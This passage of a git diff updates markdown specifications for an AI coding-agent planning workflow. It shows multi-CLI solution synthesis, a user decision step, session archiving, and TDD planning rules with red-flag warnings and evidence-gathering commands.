console.log(`
|
||||
## Solution Options
|
||||
|
||||
${synthesis.solutions.map((s, i) => `
|
||||
**Option ${i+1}: ${s.name}**
|
||||
Source: ${s.source_cli.join(' + ')}
|
||||
Effort: ${s.effort} | Risk: ${s.risk}
|
||||
|
||||
Pros: ${s.pros.join(', ')}
|
||||
Cons: ${s.cons.join(', ')}
|
||||
|
||||
Files: ${s.affected_files.slice(0,3).map(f => `${f.file}:${f.line}`).join(', ')}
|
||||
`).join('\n')}
|
||||
|
||||
## Cross-Verification
|
||||
Agreements: ${synthesis.cross_verification.agreements.length}
|
||||
Disagreements: ${synthesis.cross_verification.disagreements.length}
|
||||
`)
|
||||
```
|
||||
|
||||
### Phase 4: User Decision
|
||||
|
||||
**Decision Options**:
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "Which solution approach?",
|
||||
header: "Solution",
|
||||
multiSelect: false,
|
||||
options: solutions.map((s, i) => ({
|
||||
label: `Option ${i+1}: ${s.name}`,
|
||||
description: `${s.effort} effort, ${s.risk} risk`
|
||||
})).concat([
|
||||
{ label: "Need More Analysis", description: "Return to Phase 2" }
|
||||
])
|
||||
},
|
||||
{
|
||||
question: "Execution method:",
|
||||
header: "Execution",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Agent", description: "@code-developer agent" },
|
||||
{ label: "Codex", description: "codex CLI tool" },
|
||||
{ label: "Auto", description: "Auto-select based on complexity" }
|
||||
]
|
||||
},
|
||||
{
|
||||
question: "Code review after execution?",
|
||||
header: "Review",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Skip", description: "No review" },
|
||||
{ label: "Gemini Review", description: "Gemini CLI tool" },
|
||||
{ label: "Codex Review", description: "codex review --uncommitted" },
|
||||
{ label: "Agent Review", description: "Current agent review" }
|
||||
]
|
||||
}
|
||||
]
|
||||
})
|
||||
```
|
||||
|
||||
**Routing**:
|
||||
- Approve + execution method → Phase 5
|
||||
- Need More Analysis → Phase 2 with feedback
|
||||
- Cancel → Save session for resumption
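A sketch of the routing logic, assuming the answer labels above; `collectFeedback` and `proceedToPhase5` are hypothetical helpers standing in for the orchestrator's own steps:

```javascript
// Illustrative routing after the Phase 4 decision
if (userSelection.solution === "Need More Analysis") {
  userFeedback = collectFeedback()   // hypothetical: gather refinement notes from the user
  currentRound++                     // return to Phase 2 with feedback
} else if (userSelection.cancelled) {
  // Save session state for later resumption
  Write(`${sessionFolder}/session-state.json`,
        JSON.stringify({ status: "paused", round: currentRound }, null, 2))
} else {
  proceedToPhase5(userSelection)     // hypothetical: plan generation + execution handoff
}
```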
|
||||
|
||||
### Phase 5: Plan Generation & Execution Handoff
|
||||
|
||||
**Step 1: Build Context-Package** (Orchestrator responsibility):
|
||||
```javascript
|
||||
// Extract key information from user decision and synthesis
|
||||
const contextPackage = {
|
||||
// Core solution details
|
||||
solution: {
|
||||
name: selectedSolution.name,
|
||||
source_cli: selectedSolution.source_cli,
|
||||
feasibility: selectedSolution.feasibility,
|
||||
effort: selectedSolution.effort,
|
||||
risk: selectedSolution.risk,
|
||||
summary: selectedSolution.summary
|
||||
},
|
||||
// Implementation plan (tasks, flow, milestones)
|
||||
implementation_plan: selectedSolution.implementation_plan,
|
||||
// Dependencies
|
||||
dependencies: selectedSolution.dependencies || { internal: [], external: [] },
|
||||
// Technical concerns
|
||||
technical_concerns: selectedSolution.technical_concerns || [],
|
||||
// Consensus from cross-verification
|
||||
consensus: {
|
||||
agreements: synthesis.cross_verification.agreements,
|
||||
resolved_conflicts: synthesis.cross_verification.resolution
|
||||
},
|
||||
// User constraints (from Phase 4 feedback)
|
||||
constraints: userConstraints || [],
|
||||
// Task context
|
||||
task_description: taskDescription,
|
||||
session_id: sessionId
|
||||
}
|
||||
|
||||
// Write context-package for traceability
|
||||
Write(`${sessionFolder}/context-package.json`, JSON.stringify(contextPackage, null, 2))
|
||||
```
|
||||
|
||||
**Context-Package Schema**:
|
||||
|
||||
| Field | Type | Description |
|
||||
|-------|------|-------------|
|
||||
| `solution` | object | User-selected solution from synthesis |
|
||||
| `solution.name` | string | Solution identifier |
|
||||
| `solution.feasibility` | number | Viability score (0-1) |
|
||||
| `solution.summary` | string | Brief analysis summary |
|
||||
| `implementation_plan` | object | Task breakdown with flow and dependencies |
|
||||
| `implementation_plan.approach` | string | High-level technical strategy |
|
||||
| `implementation_plan.tasks[]` | array | Discrete tasks with id, name, depends_on, files |
|
||||
| `implementation_plan.execution_flow` | string | Task sequence (e.g., "T1 → T2 → T3") |
|
||||
| `implementation_plan.milestones` | string[] | Key checkpoints |
|
||||
| `dependencies` | object | Module and package dependencies |
|
||||
| `technical_concerns` | string[] | Risks and blockers |
|
||||
| `consensus` | object | Cross-verified agreements from multi-CLI |
|
||||
| `constraints` | string[] | User-specified constraints from Phase 4 |
|
||||
|
||||
```json
|
||||
{
|
||||
"solution": {
|
||||
"name": "Strategy Pattern Refactoring",
|
||||
"source_cli": ["gemini", "codex"],
|
||||
"feasibility": 0.88,
|
||||
"effort": "medium",
|
||||
"risk": "low",
|
||||
"summary": "Extract payment gateway interface, implement strategy pattern for multi-gateway support"
|
||||
},
|
||||
"implementation_plan": {
|
||||
"approach": "Define interface → Create concrete strategies → Implement factory → Migrate existing code",
|
||||
"tasks": [
|
||||
{"id": "T1", "name": "Define PaymentGateway interface", "depends_on": [], "files": [{"file": "src/types/payment.ts", "line": 1, "action": "create"}], "key_point": "Include all existing Stripe methods"},
|
||||
{"id": "T2", "name": "Implement StripeGateway", "depends_on": ["T1"], "files": [{"file": "src/payment/stripe.ts", "line": 1, "action": "create"}], "key_point": "Wrap existing logic"},
|
||||
{"id": "T3", "name": "Create GatewayFactory", "depends_on": ["T1"], "files": [{"file": "src/payment/factory.ts", "line": 1, "action": "create"}], "key_point": null},
|
||||
{"id": "T4", "name": "Migrate processor to use factory", "depends_on": ["T2", "T3"], "files": [{"file": "src/payment/processor.ts", "line": 45, "action": "modify"}], "key_point": "Backward compatible"}
|
||||
],
|
||||
"execution_flow": "T1 → (T2 | T3) → T4",
|
||||
"milestones": ["Interface defined", "Gateway implementations complete", "Migration done"]
|
||||
},
|
||||
"dependencies": {
|
||||
"internal": ["@/lib/payment-gateway", "@/types/payment"],
|
||||
"external": ["stripe@^14.0.0"]
|
||||
},
|
||||
"technical_concerns": ["Existing tests must pass", "No breaking API changes"],
|
||||
"consensus": {
|
||||
"agreements": ["Use strategy pattern", "Keep existing API"],
|
||||
"resolved_conflicts": "Factory over DI for simpler integration"
|
||||
},
|
||||
"constraints": ["backward compatible", "no breaking changes to PaymentResult type"],
|
||||
"task_description": "Refactor payment processing for multi-gateway support",
|
||||
"session_id": "MCP-payment-refactor-2026-01-14"
|
||||
}
|
||||
```
|
||||
|
||||
**Step 2: Invoke Planning Agent**:
|
||||
```javascript
|
||||
Task({
|
||||
subagent_type: "cli-lite-planning-agent",
|
||||
run_in_background: false,
|
||||
description: "Generate implementation plan",
|
||||
prompt: `
|
||||
## Schema Reference
|
||||
Execute: cat ~/.claude/workflows/cli-templates/schemas/plan-json-schema.json
|
||||
|
||||
## Context-Package (from orchestrator)
|
||||
${JSON.stringify(contextPackage, null, 2)}
|
||||
|
||||
## Execution Process
|
||||
1. Read plan-json-schema.json for output structure
|
||||
2. Read project-tech.json and project-guidelines.json
|
||||
3. Parse context-package fields:
|
||||
- solution: name, feasibility, summary
|
||||
- implementation_plan: tasks[], execution_flow, milestones
|
||||
- dependencies: internal[], external[]
|
||||
- technical_concerns: risks/blockers
|
||||
- consensus: agreements, resolved_conflicts
|
||||
- constraints: user requirements
|
||||
4. Use implementation_plan.tasks[] as task foundation
|
||||
5. Preserve task dependencies (depends_on) and execution_flow
|
||||
6. Expand tasks with detailed acceptance criteria
|
||||
7. Generate plan.json following schema exactly
|
||||
|
||||
## Output
|
||||
- ${sessionFolder}/plan.json
|
||||
|
||||
## Completion Checklist
|
||||
- [ ] plan.json preserves task dependencies from implementation_plan
|
||||
- [ ] Task execution order follows execution_flow
|
||||
- [ ] Key_points reflected in task descriptions
|
||||
- [ ] User constraints applied to implementation
|
||||
- [ ] Acceptance criteria are testable
|
||||
- [ ] Schema fields match plan-json-schema.json exactly
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
**Step 3: Build executionContext**:
|
||||
```javascript
|
||||
// After plan.json is generated by cli-lite-planning-agent
|
||||
const plan = JSON.parse(Read(`${sessionFolder}/plan.json`))
|
||||
|
||||
// Build executionContext (same structure as lite-plan)
|
||||
executionContext = {
|
||||
planObject: plan,
|
||||
explorationsContext: null, // Multi-CLI doesn't use exploration files
|
||||
explorationAngles: [], // No exploration angles
|
||||
explorationManifest: null, // No manifest
|
||||
clarificationContext: null, // Store user feedback from Phase 2 if exists
|
||||
executionMethod: userSelection.execution_method, // From Phase 4
|
||||
codeReviewTool: userSelection.code_review_tool, // From Phase 4
|
||||
originalUserInput: taskDescription,
|
||||
|
||||
// Optional: Task-level executor assignments
|
||||
executorAssignments: null, // Could be enhanced in future
|
||||
|
||||
session: {
|
||||
id: sessionId,
|
||||
folder: sessionFolder,
|
||||
artifacts: {
|
||||
explorations: [], // No explorations in multi-CLI workflow
|
||||
explorations_manifest: null,
|
||||
plan: `${sessionFolder}/plan.json`,
|
||||
synthesis_rounds: Array.from({length: currentRound}, (_, i) =>
|
||||
`${sessionFolder}/rounds/${i+1}/synthesis.json`
|
||||
),
|
||||
context_package: `${sessionFolder}/context-package.json`
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Step 4: Hand off to Execution**:
|
||||
```javascript
|
||||
// Hand off to lite-execute with in-memory context
|
||||
SlashCommand("/workflow:lite-execute --in-memory")
|
||||
```
|
||||
|
||||
## Output File Structure
|
||||
|
||||
```
|
||||
.workflow/.multi-cli-plan/{MCP-task-slug-YYYY-MM-DD}/
|
||||
├── session-state.json # Session tracking (orchestrator)
|
||||
├── rounds/
|
||||
│ ├── 1/synthesis.json # Round 1 analysis (cli-discuss-agent)
|
||||
│ ├── 2/synthesis.json # Round 2 analysis (cli-discuss-agent)
|
||||
│ └── .../
|
||||
├── context-package.json # Extracted context for planning (orchestrator)
|
||||
└── plan.json # Structured plan (cli-lite-planning-agent)
|
||||
```
|
||||
|
||||
**File Producers**:
|
||||
|
||||
| File | Producer | Content |
|
||||
|------|----------|---------|
|
||||
| `session-state.json` | Orchestrator | Session metadata, rounds, decisions |
|
||||
| `rounds/*/synthesis.json` | cli-discuss-agent | Solutions, convergence, cross-verification |
|
||||
| `context-package.json` | Orchestrator | Extracted solution, dependencies, consensus for planning |
|
||||
| `plan.json` | cli-lite-planning-agent | Structured tasks for lite-execute |
|
||||
|
||||
## synthesis.json Schema
|
||||
|
||||
```json
|
||||
{
|
||||
"round": 1,
|
||||
"solutions": [{
|
||||
"name": "Solution Name",
|
||||
"source_cli": ["gemini", "codex"],
|
||||
"feasibility": 0.85,
|
||||
"effort": "low|medium|high",
|
||||
"risk": "low|medium|high",
|
||||
"summary": "Brief analysis summary",
|
||||
"implementation_plan": {
|
||||
"approach": "High-level technical approach",
|
||||
"tasks": [
|
||||
{"id": "T1", "name": "Task", "depends_on": [], "files": [], "key_point": "..."}
|
||||
],
|
||||
"execution_flow": "T1 → T2 → T3",
|
||||
"milestones": ["Checkpoint 1", "Checkpoint 2"]
|
||||
},
|
||||
"dependencies": {"internal": [], "external": []},
|
||||
"technical_concerns": ["Risk 1", "Blocker 2"]
|
||||
}],
|
||||
"convergence": {
|
||||
"score": 0.85,
|
||||
"new_insights": false,
|
||||
"recommendation": "converged|continue|user_input_needed"
|
||||
},
|
||||
"cross_verification": {
|
||||
"agreements": [],
|
||||
"disagreements": [],
|
||||
"resolution": "..."
|
||||
},
|
||||
"clarification_questions": []
|
||||
}
|
||||
```
|
||||
|
||||
**Key Planning Fields**:
|
||||
|
||||
| Field | Purpose |
|
||||
|-------|---------|
|
||||
| `feasibility` | Viability score (0-1) |
|
||||
| `implementation_plan.tasks[]` | Discrete tasks with dependencies |
|
||||
| `implementation_plan.execution_flow` | Task sequence visualization |
|
||||
| `implementation_plan.milestones` | Key checkpoints |
|
||||
| `technical_concerns` | Risks and blockers |
|
||||
|
||||
**Note**: Solutions ranked by internal scoring (array order = priority)
|
||||
|
||||
## TodoWrite Structure
|
||||
|
||||
**Initialization**:
|
||||
```javascript
|
||||
TodoWrite({ todos: [
|
||||
{ content: "Phase 1: Context Gathering", status: "in_progress", activeForm: "Gathering context" },
|
||||
{ content: "Phase 2: Multi-CLI Discussion", status: "pending", activeForm: "Running discussion" },
|
||||
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
|
||||
{ content: "Phase 4: User Decision", status: "pending", activeForm: "Awaiting decision" },
|
||||
{ content: "Phase 5: Plan Generation", status: "pending", activeForm: "Generating plan" }
|
||||
]})
|
||||
```
|
||||
|
||||
**During Discussion Rounds**:
|
||||
```javascript
|
||||
TodoWrite({ todos: [
|
||||
{ content: "Phase 1: Context Gathering", status: "completed", activeForm: "Gathering context" },
|
||||
{ content: "Phase 2: Multi-CLI Discussion", status: "in_progress", activeForm: "Running discussion" },
|
||||
{ content: " → Round 1: Initial analysis", status: "completed", activeForm: "Analyzing" },
|
||||
{ content: " → Round 2: Deep verification", status: "in_progress", activeForm: "Verifying" },
|
||||
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
|
||||
// ...
|
||||
]})
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error | Resolution |
|
||||
|-------|------------|
|
||||
| ACE search fails | Fall back to Glob/Grep for file discovery |
|
||||
| Agent fails | Retry once, then present partial results |
|
||||
| CLI timeout (in agent) | Agent uses fallback: gemini → codex → claude |
|
||||
| No convergence | Present best options, flag uncertainty |
|
||||
| synthesis.json parse error | Request agent retry |
|
||||
| User cancels | Save session for later resumption |
|
||||
|
||||
## Configuration
|
||||
|
||||
| Flag | Default | Description |
|
||||
|------|---------|-------------|
|
||||
| `--max-rounds` | 3 | Maximum discussion rounds |
|
||||
| `--tools` | gemini,codex | CLI tools for analysis |
|
||||
| `--mode` | parallel | Execution mode: parallel or serial |
|
||||
| `--auto-execute` | false | Auto-execute after approval |
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Be Specific**: Detailed task descriptions improve ACE context quality
|
||||
2. **Provide Feedback**: Use clarification rounds to refine requirements
|
||||
3. **Trust Cross-Verification**: Multi-CLI consensus indicates high confidence
|
||||
4. **Review Trade-offs**: Consider pros/cons before selecting solution
|
||||
5. **Check synthesis.json**: Review agent output for detailed analysis
|
||||
6. **Iterate When Needed**: Don't hesitate to request more analysis
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
# Simpler single-round planning
|
||||
/workflow:lite-plan "task description"
|
||||
|
||||
# Issue-driven discovery
|
||||
/issue:discover-by-prompt "find issues"
|
||||
|
||||
# View session files
|
||||
cat .workflow/.multi-cli-plan/{session-id}/plan.json
|
||||
cat .workflow/.multi-cli-plan/{session-id}/rounds/1/synthesis.json
|
||||
cat .workflow/.multi-cli-plan/{session-id}/context-package.json
|
||||
|
||||
# Direct execution (if you have plan.json)
|
||||
/workflow:lite-execute plan.json
|
||||
```
|
||||
@@ -585,6 +585,10 @@ TodoWrite({
|
||||
- Mark completed immediately after each group finishes
|
||||
- Update parent phase status when all child items complete
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into issues (test/enhance/refactor/doc); for each selected dimension, invoke `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Trust AI Planning**: The planning agent's grouping and execution strategy are based on dependency analysis
|
||||
|
||||
@@ -107,13 +107,13 @@ rm -f .workflow/archives/$SESSION_ID/.archiving
|
||||
Manifest: Updated with N total sessions
|
||||
```
|
||||
|
||||
### Phase 4: Update project.json (Optional)
|
||||
### Phase 4: Update project-tech.json (Optional)
|
||||
|
||||
**Skip if**: `.workflow/project.json` doesn't exist
|
||||
**Skip if**: `.workflow/project-tech.json` doesn't exist
|
||||
|
||||
```bash
|
||||
# Check
|
||||
test -f .workflow/project.json || echo "SKIP"
|
||||
test -f .workflow/project-tech.json || echo "SKIP"
|
||||
```
|
||||
|
||||
**If exists**, add feature entry:
|
||||
@@ -134,6 +134,32 @@ test -f .workflow/project.json || echo "SKIP"
|
||||
✓ Feature added to project registry
|
||||
```
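A minimal sketch of this update, assuming `project-tech.json` keeps a top-level `features` array (the exact schema is defined elsewhere, so the field names below are illustrative):

```bash
# Illustrative fields - append a feature entry and write back atomically
jq --arg id "$SESSION_ID" --arg summary "Feature summary" \
   '.features += [{"session": $id, "summary": $summary, "archived_at": (now | todate)}]' \
   .workflow/project-tech.json > .workflow/project-tech.json.tmp \
  && mv .workflow/project-tech.json.tmp .workflow/project-tech.json
```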
|
||||
|
||||
### Phase 5: Ask About Solidify (Always)
|
||||
|
||||
After successful archival, prompt user to capture learnings:
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Would you like to solidify learnings from this session into project guidelines?",
|
||||
header: "Solidify",
|
||||
options: [
|
||||
{ label: "Yes, solidify now", description: "Extract learnings and update project-guidelines.json" },
|
||||
{ label: "Skip", description: "Archive complete, no learnings to capture" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**If "Yes, solidify now"**: Execute `/workflow:session:solidify` with the archived session ID.
|
||||
|
||||
**Output**:
|
||||
```
|
||||
Session archived successfully.
|
||||
→ Run /workflow:session:solidify to capture learnings (recommended)
|
||||
```
|
||||
|
||||
## Error Recovery
|
||||
|
||||
| Phase | Symptom | Recovery |
|
||||
@@ -149,5 +175,6 @@ test -f .workflow/project.json || echo "SKIP"
|
||||
Phase 1: find session → create .archiving marker
|
||||
Phase 2: read key files → build manifest entry (no writes)
|
||||
Phase 3: mkdir → mv → update manifest.json → rm marker
|
||||
Phase 4: update project.json features array (optional)
|
||||
Phase 4: update project-tech.json features array (optional)
|
||||
Phase 5: ask user → solidify learnings (optional)
|
||||
```
|
||||
|
||||
@@ -16,7 +16,7 @@ examples:
|
||||
Manages workflow sessions with three operation modes: discovery (manual), auto (intelligent), and force-new.
|
||||
|
||||
**Dual Responsibility**:
|
||||
1. **Project-level initialization** (first-time only): Creates `.workflow/project.json` for feature registry
|
||||
1. **Project-level initialization** (first-time only): Creates `.workflow/project-tech.json` for feature registry
|
||||
2. **Session-level initialization** (always): Creates session directory structure
|
||||
|
||||
## Session Types
|
||||
|
||||
@@ -37,6 +37,44 @@ allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*)
|
||||
7. **Task Attachment Model**: SlashCommand execute **attaches** sub-tasks to current workflow. Orchestrator **executes** these attached tasks itself, then **collapses** them after completion
|
||||
8. **⚠️ CRITICAL: DO NOT STOP**: Continuous multi-phase workflow. After executing all attached tasks, immediately collapse them and execute next phase
|
||||
|
||||
## TDD Compliance Requirements
|
||||
|
||||
### The Iron Law
|
||||
|
||||
```
|
||||
NO PRODUCTION CODE WITHOUT A FAILING TEST FIRST
|
||||
```
|
||||
|
||||
**Enforcement Method**:
|
||||
- Phase 5: `implementation_approach` includes test-first steps (Red → Green → Refactor)
|
||||
- Green phase: Includes test-fix-cycle configuration (max 3 iterations)
|
||||
- Auto-revert: Triggered when max iterations reached without passing tests
|
||||
|
||||
**Verification**: Phase 6 validates Red-Green-Refactor structure in all generated tasks
|
||||
|
||||
### TDD Compliance Checkpoint
|
||||
|
||||
| Checkpoint | Validation Phase | Evidence Required |
|
||||
|------------|------------------|-------------------|
|
||||
| Test-first structure | Phase 5 | `implementation_approach` has 3 steps |
|
||||
| Red phase exists | Phase 6 | Step 1: `tdd_phase: "red"` |
|
||||
| Green phase with test-fix | Phase 6 | Step 2: `tdd_phase: "green"` + test-fix-cycle |
|
||||
| Refactor phase exists | Phase 6 | Step 3: `tdd_phase: "refactor"` |
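These checkpoints can be spot-checked mechanically using the same task-JSON fields referenced later in the Phase 6 evidence-gathering commands; a minimal sketch:

```bash
# Confirm each IMPL task declares the red → green → refactor sequence
for task in .workflow/active/[sessionId]/.task/IMPL-*.json; do
  phases=$(jq -r '[.flow_control.implementation_approach[].tdd_phase] | join(",")' "$task")
  [ "$phases" = "red,green,refactor" ] || echo "⚠️ TDD Red Flag: unexpected phase order ($phases) in $task"
done
```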
|
||||
|
||||
### Core TDD Principles (from ref skills)
|
||||
|
||||
**Red Flags - STOP and Reassess**:
|
||||
- Code written before test
|
||||
- Test passes immediately (no Red phase witnessed)
|
||||
- Cannot explain why test should fail
|
||||
- "Just this once" rationalization
|
||||
- "Tests after achieve same goals" thinking
|
||||
|
||||
**Why Order Matters**:
|
||||
- Tests written after code pass immediately → proves nothing
|
||||
- Test-first forces edge case discovery before implementation
|
||||
- Tests-after verify what was built, not what's required
|
||||
|
||||
## 6-Phase Execution (with Conflict Resolution)
|
||||
|
||||
### Phase 1: Session Discovery
|
||||
@@ -183,7 +221,7 @@ SlashCommand(command="/workflow:tools:conflict-resolution --session [sessionId]
|
||||
{"content": "Phase 3: Test Coverage Analysis", "status": "completed", "activeForm": "Executing test coverage analysis"},
|
||||
{"content": "Phase 4: Conflict Resolution", "status": "in_progress", "activeForm": "Executing conflict resolution"},
|
||||
{"content": " → Detect conflicts with CLI analysis", "status": "in_progress", "activeForm": "Detecting conflicts"},
|
||||
{"content": " → Present conflicts to user", "status": "pending", "activeForm": "Presenting conflicts"},
|
||||
{"content": " → Log and analyze detected conflicts", "status": "pending", "activeForm": "Analyzing conflicts"},
|
||||
{"content": " → Apply resolution strategies", "status": "pending", "activeForm": "Applying resolution strategies"},
|
||||
{"content": "Phase 5: TDD Task Generation", "status": "pending", "activeForm": "Executing TDD task generation"},
|
||||
{"content": "Phase 6: TDD Structure Validation", "status": "pending", "activeForm": "Validating TDD structure"}
|
||||
@@ -251,6 +289,13 @@ SlashCommand(command="/workflow:tools:task-generate-tdd --session [sessionId]")
|
||||
- IMPL_PLAN.md contains workflow_type: "tdd" in frontmatter
|
||||
- Task count ≤10 (compliance with task limit)
|
||||
|
||||
**Red Flag Detection** (Non-Blocking Warnings):
|
||||
- Task count >10: `⚠️ High task count may indicate insufficient decomposition`
|
||||
- Missing test-fix-cycle: `⚠️ Green phase lacks auto-revert configuration`
|
||||
- Generic task names: `⚠️ Vague task names suggest unclear TDD cycles`
|
||||
|
||||
**Action**: Log warnings to `.workflow/active/[sessionId]/.process/tdd-warnings.log` (non-blocking)
|
||||
|
||||
<!-- TodoWrite: When task-generate-tdd executed, INSERT 3 task-generate-tdd tasks -->
|
||||
|
||||
**TodoWrite Update (Phase 5 SlashCommand executed - tasks attached)**:
|
||||
@@ -302,6 +347,42 @@ SlashCommand(command="/workflow:tools:task-generate-tdd --session [sessionId]")
|
||||
5. Test-fix cycle: Green phase step includes test-fix-cycle logic with max_iterations
|
||||
6. Task count: Total tasks ≤10 (simple + subtasks)
|
||||
|
||||
**Red Flag Checklist** (from TDD best practices):
|
||||
- [ ] No tasks skip Red phase (`tdd_phase: "red"` exists in step 1)
|
||||
- [ ] Test files referenced in Red phase (explicit paths, not placeholders)
|
||||
- [ ] Green phase has test-fix-cycle with `max_iterations` configured
|
||||
- [ ] Refactor phase has clear completion criteria
|
||||
|
||||
**Non-Compliance Warning Format**:
|
||||
```
|
||||
⚠️ TDD Red Flag: [issue description]
|
||||
Task: [IMPL-N]
|
||||
Recommendation: [action to fix]
|
||||
```
|
||||
|
||||
**Evidence Gathering** (Before Completion Claims):
|
||||
|
||||
```bash
|
||||
# Verify session artifacts exist
|
||||
ls -la .workflow/active/[sessionId]/{IMPL_PLAN.md,TODO_LIST.md}
|
||||
ls -la .workflow/active/[sessionId]/.task/IMPL-*.json
|
||||
|
||||
# Count generated artifacts
|
||||
echo "IMPL tasks: $(ls .workflow/active/[sessionId]/.task/IMPL-*.json 2>/dev/null | wc -l)"
|
||||
|
||||
# Sample task structure verification (first task)
|
||||
jq '{id, tdd: .meta.tdd_workflow, phases: [.flow_control.implementation_approach[].tdd_phase]}' \
|
||||
"$(ls .workflow/active/[sessionId]/.task/IMPL-*.json | head -1)"
|
||||
```
|
||||
|
||||
**Evidence Required Before Summary**:
|
||||
| Evidence Type | Verification Method | Pass Criteria |
|
||||
|---------------|---------------------|---------------|
|
||||
| File existence | `ls -la` artifacts | All files present |
|
||||
| Task count | Count IMPL-*.json | Count matches claims |
|
||||
| TDD structure | jq sample extraction | Shows red/green/refactor |
|
||||
| Warning log | Check tdd-warnings.log | Logged (may be empty) |
|
||||
|
||||
**Return Summary**:
|
||||
```
|
||||
TDD Planning complete for session: [sessionId]
|
||||
@@ -333,6 +414,9 @@ TDD Configuration:
|
||||
- Green phase includes test-fix cycle (max 3 iterations)
|
||||
- Auto-revert on max iterations reached
|
||||
|
||||
⚠️ ACTION REQUIRED: Before execution, ensure you understand WHY each Red phase test is expected to fail.
|
||||
This is crucial for valid TDD - if you don't know why the test fails, you can't verify it tests the right thing.
|
||||
|
||||
Recommended Next Steps:
|
||||
1. /workflow:action-plan-verify --session [sessionId] # Verify TDD plan quality and dependencies
|
||||
2. /workflow:execute --session [sessionId] # Start TDD execution
|
||||
@@ -400,7 +484,7 @@ TDD Workflow Orchestrator
|
||||
│ IF conflict_risk ≥ medium:
|
||||
│ └─ /workflow:tools:conflict-resolution ← ATTACHED (3 tasks)
|
||||
│ ├─ Phase 4.1: Detect conflicts with CLI
|
||||
│ ├─ Phase 4.2: Present conflicts to user
|
||||
│ ├─ Phase 4.2: Log and analyze detected conflicts
|
||||
│ └─ Phase 4.3: Apply resolution strategies
|
||||
│ └─ Returns: conflict-resolution.json ← COLLAPSED
|
||||
│ ELSE:
|
||||
@@ -439,6 +523,34 @@ Convert user input to TDD-structured format:
|
||||
- **Command failure**: Keep phase in_progress, report error
|
||||
- **TDD validation failure**: Report incomplete chains or wrong dependencies
|
||||
|
||||
### TDD Warning Patterns
|
||||
|
||||
| Pattern | Warning Message | Recommended Action |
|
||||
|---------|----------------|-------------------|
|
||||
| Task count >10 | High task count detected | Consider splitting into multiple sessions |
|
||||
| Missing test-fix-cycle | Green phase lacks auto-revert | Add `max_iterations: 3` to task config |
|
||||
| Red phase missing test path | Test file path not specified | Add explicit test file paths |
|
||||
| Generic task names | Vague names like "Add feature" | Use specific behavior descriptions |
|
||||
| No refactor criteria | Refactor phase lacks completion criteria | Define clear refactor scope |
|
||||
|
||||
### Non-Blocking Warning Policy
|
||||
|
||||
**All warnings are advisory** - they do not halt execution:
|
||||
1. Warnings logged to `.process/tdd-warnings.log`
|
||||
2. Summary displayed in Phase 6 output
|
||||
3. User decides whether to address before `/workflow:execute`
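For example, a warning can be appended in the documented format without interrupting the run; a minimal sketch with illustrative values:

```bash
# Non-blocking: append a formatted warning and continue
cat >> .workflow/active/[sessionId]/.process/tdd-warnings.log <<'EOF'
⚠️ TDD Red Flag: Green phase lacks auto-revert configuration
Task: IMPL-3
Recommendation: Add max_iterations: 3 to the test-fix-cycle config
EOF
```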
|
||||
|
||||
### Error Handling Quick Reference
|
||||
|
||||
| Error Type | Detection | Recovery Action |
|
||||
|------------|-----------|-----------------|
|
||||
| Parsing failure | Empty/malformed output | Retry once, then report |
|
||||
| Missing context-package | File read error | Re-run `/workflow:tools:context-gather` |
|
||||
| Invalid task JSON | jq parse error | Report malformed file path |
|
||||
| High task count (>10) | Count validation | Log warning, continue (non-blocking) |
|
||||
| Test-context missing | File not found | Re-run `/workflow:tools:test-context-gather` |
|
||||
| Phase timeout | No response | Retry phase, check CLI connectivity |
|
||||
|
||||
## Related Commands
|
||||
|
||||
**Prerequisite Commands**:
|
||||
@@ -458,3 +570,28 @@ Convert user input to TDD-structured format:
|
||||
- `/workflow:execute` - Begin TDD implementation
|
||||
- `/workflow:tdd-verify` - Post-execution: Verify TDD compliance and generate quality report
|
||||
|
||||
## Next Steps Decision Table
|
||||
|
||||
| Situation | Recommended Command | Purpose |
|
||||
|-----------|---------------------|---------|
|
||||
| First time planning | `/workflow:action-plan-verify` | Validate task structure before execution |
|
||||
| Warnings in tdd-warnings.log | Review log, refine tasks | Address Red Flags before proceeding |
|
||||
| High task count warning | Consider `/workflow:session:start` | Split into focused sub-sessions |
|
||||
| Ready to implement | `/workflow:execute` | Begin TDD Red-Green-Refactor cycles |
|
||||
| After implementation | `/workflow:tdd-verify` | Generate TDD compliance report |
|
||||
| Need to review tasks | `/workflow:status --session [id]` | Inspect current task breakdown |
|
||||
| Plan needs changes | `/task:replan` | Update task JSON with new requirements |
|
||||
|
||||
### TDD Workflow State Transitions
|
||||
|
||||
```
|
||||
/workflow:tdd-plan
|
||||
↓
|
||||
[Planning Complete] ──→ /workflow:action-plan-verify (recommended)
|
||||
↓
|
||||
[Verified/Ready] ─────→ /workflow:execute
|
||||
↓
|
||||
[Implementation] ─────→ /workflow:tdd-verify (post-execution)
|
||||
↓
|
||||
[Quality Report] ─────→ Done or iterate
|
||||
```
|
||||
|
||||
@@ -491,6 +491,10 @@ The orchestrator automatically creates git commits at key checkpoints to enable
|
||||
|
||||
**Note**: Final session completion creates additional commit with full summary.
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into issues (test/enhance/refactor/doc); for each selected dimension, invoke `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Default Settings Work**: 10 iterations sufficient for most cases
|
||||
|
||||
@@ -154,8 +154,8 @@ Task(subagent_type="cli-execution-agent", run_in_background=false, prompt=`
|
||||
- Validation of exploration conflict_indicators
|
||||
- ModuleOverlap conflicts with overlap_analysis
|
||||
- Targeted clarification questions
|
||||
